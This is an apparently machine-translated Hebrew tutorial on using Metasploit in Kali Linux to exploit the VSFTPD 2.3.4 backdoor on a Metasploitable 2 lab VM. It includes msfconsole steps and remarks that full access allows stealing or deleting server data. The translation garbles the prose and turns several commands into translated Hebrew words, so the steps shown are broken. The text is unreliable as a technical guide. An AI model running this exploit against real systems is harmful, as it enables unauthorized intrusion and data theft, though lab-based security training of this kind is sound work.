Metasploit בקאלי לינוקס 2020

Metasploit Kali Linux 2020



בדיקת חדירה עם Kali Linux


האינטרנט מלא באורחים בעלי כוונות זדוניות שרוצים לגשת לרשתות ולנצל את הנתונים שלהם תוך התחמקות מגילוי. הגיוני רק להבטיח את אבטחת הרשת על ידי מדידת נקודות התורפה שלהם. בדיקת חדירה או פריצה אתית היא האופן שבו אנו בודקים רשתות או שרתים לאיתור מטרות בהריון על ידי איתור כל ההפרות האפשריות שהאקר עשוי להשתמש בהן כדי לקבל גישה, ובכך לצמצם פשרות אבטחה. בדיקות חדירה מתבצעות לרוב באמצעות יישומי תוכנה, שהפופולרי שבהם הוא Kali Linux, רצוי עם מסגרת Metasploit. הישאר עד הסוף כדי ללמוד כיצד לבדוק מערכת על ידי ביצוע התקפה עם Kali Linux.

היכרות עם מסגרת Kali Linux ו- Metasploit

קלי לינוקס הוא אחד מכלי אבטחת המערכת המתקדמים הרבים שפותחו (ומתעדכנים באופן שוטף) על ידי Offensive Security. זוהי מערכת הפעלה מבוססת לינוקס המגיעה עם חבילת כלים שנועדה בעיקר לבדיקת חדירה. זה די קל לשימוש (לפחות בהשוואה לתוכניות בדיקת עט אחרות) ומסובך מספיק כדי להציג תוצאות נאותות.







ה מסגרת Metasploit היא פלטפורמת בדיקת חדירה מודולרית בעלת קוד פתוח המשמשת לתקיפת מערכות לבדיקת מעללי אבטחה. זהו אחד מכלי בדיקת החדירה הנפוצים ביותר ומגיע מובנה ב- Kali Linux.



Metasploit מורכב מחנות נתונים וממודולים. Datastore מאפשרת למשתמש להגדיר את ההיבטים בתוך המסגרת, בעוד שהמודולים הם קטעי קודים עצמאיים שמהם Metasploit נובעת מהתכונות שלה. מכיוון שאנו מתמקדים בביצוע התקפה לבדיקת עטים, נשאיר את הדיון במודולים.



בסך הכל ישנם חמישה מודולים:





לְנַצֵל - מתחמק מאיתור, פורץ למערכת ומעלה את מודול המטען
מטען - מאפשר למשתמש גישה למערכת
עזר - תומך בהפרה על ידי ביצוע משימות שאינן קשורות לניצול
הודעה - פעולה - מאפשר גישה נוספת למערכת שכבר נפגעת
NOP גֵנֵרָטוֹר - משמש לעקיפת כתובות אבטחה

למטרותינו, נשתמש במודולים של ניצול ומטענים כדי לקבל גישה למערכת היעד שלנו.



הקמת מעבדת בדיקת העט שלך

נזדקק לתוכנה הבאה:

Kali Linux:

Kali Linux תופעל מהחומרה המקומית שלנו. אנו נשתמש במסגרת Metasploit שלה לאיתור מעללי.

מומחה היפר:

נזדקק ל- hypervisor שכן הוא מאפשר לנו ליצור מכונה וירטואלית המאפשר לנו לעבוד על יותר ממערכת הפעלה אחת בו זמנית. זהו תנאי הכרחי לבדיקת חדירה. לשיט חלק ולתוצאות טובות יותר, אנו ממליצים להשתמש באחד מהם Virtualbox אוֹ מיקרוסופט Hyper-V ליצירת המחשב הווירטואלי .

Metasploitable 2

אין להתבלבל עם Metasploit, שהיא מסגרת ב- Kali Linux, metasploitable היא מכונה וירטואלית פגיעה מכוונת שתוכנתה להכשיר אנשי מקצוע בתחום אבטחת הסייבר. ל- Metasploitable 2 יש טונות של פגיעויות ניתנות לבדיקה שנוכל לנצל, ויש מספיק מידע זמין באינטרנט כדי לעזור לנו להתחיל.

למרות שתקיפת המערכת הווירטואלית ב- Metasploitable 2 היא קלה מכיוון שהפגיעות שלה מתועדות היטב, תצטרך הרבה יותר מומחיות וסבלנות עם מכונות ורשתות אמיתיות שבסופו של דבר תבצע עבורן את בדיקת החדירה. אך השימוש ב- metasploitable 2 לבדיקת עט משמש כנקודת מוצא מצוינת ללמוד על השיטה.

אנו נשתמש ב- metasploitable 2 להמשך בדיקת העטים שלנו. אתה לא צריך הרבה זיכרון מחשב כדי שהמכונה הווירטואלית הזו תפעל, שטח דיסק קשיח של 10 GB ו -512 MB RAM צריך להסתדר מצוין. רק הקפד לשנות את הגדרות הרשת של Metasploitable למתאם המארח בלבד בזמן התקנתו. לאחר ההתקנה, הפעל את Metasploitable והיכנס. הפעל את Kali Linux כך שנוכל לגרום למסגרת Metasploit שלה לפעול ליזום הבדיקות שלנו.

ניצול VSFTPD v2.3.4 ביצוע פקודות דלת אחורית

עם כל הדברים במקומם, סוף סוף נוכל לחפש פגיעות לניצול. אתה יכול לחפש באינטרנט פגיעויות שונות, אך עבור הדרכה זו נראה כיצד ניתן לנצל VSFTPD v2.3.4. VSFTPD מייצג שד FTP מאובטח מאוד. בחרנו את הדובדבן הזה מכיוון שהוא מעניק לנו גישה מלאה לממשק של Metasploitable מבלי לבקש רשות.

הפעל את מסוף Metasploit. עבור לשורת הפקודה ב- Kali Linux והזן את הקוד הבא:

$סודוmsfconsole

כשהקונסולה פתוחה כעת, הקלד:

$חיפוש vsftpd

זה מעלה את מיקום הפגיעות שאנו רוצים לנצל. כדי לבחור אותו, הקלד

$להשתמש בניצול/יוניקס/ftp/vsftpd_234_backdoor

כדי לראות איזה מידע נוסף נדרש לאתחול הניצול, הקלד

$הצג אפשרויות

המידע היחיד בעל חשיבות מהותית כלשהי חסר הוא ה- IP, שנספק אותו.

חפש את כתובת ה- IP ב- metasploitable על ידי הקלדה

$ifconfig

במעטפת הפיקוד שלו

כתובת ה- IP נמצאת בתחילת השורה השנייה, בערך

#inet addr: 10.0.2.15

הקלד פקודה זו כדי להפנות את Metasploit למערכת היעד, והתחל בניצול. אני משתמש ב- ip שלי, אך זה יגרום לשגיאה, אולם אם תשתמש ב- IP קורבן אחר, תקבל תוצאות מהניצול

$מַעֲרֶכֶתלהקשיב[כתובת ה- IP של הקורבן]

$לָרוּץ

כעת, עם גישה מלאה שניתן ל- Metasploitable, אנו יכולים לנווט במערכת ללא כל הגבלה. אתה יכול להוריד נתונים מסווגים או להסיר כל דבר חשוב מהשרת. במצבים אמיתיים, בהם blackhat מקבל גישה לשרת כזה, הם עשויים אפילו לכבות את המעבד ולגרום גם למחשבים אחרים המחוברים אליו לקרוס.

עוטף את העניינים

עדיף לחסל בעיות מראש ולא להגיב עליהן. בדיקת חדירה יכולה לחסוך לכם הרבה טרחה והתעדכנות בכל הנוגע לאבטחת המערכות שלכם, בין אם מדובר במכונת מחשב אחת או ברשת שלמה. בהתחשב בכך, כדאי שיהיה לך ידע בסיסי בנושא בדיקת עטים. Metasploitable הוא כלי מצוין ללימוד היסודות שלו, מכיוון שהפגיעות שלו ידועות, כך שיש עליו מידע רב. עבדנו רק על ניצל אחד עם קלי לינוקס, אך אנו ממליצים בחום להסתכל עליהם.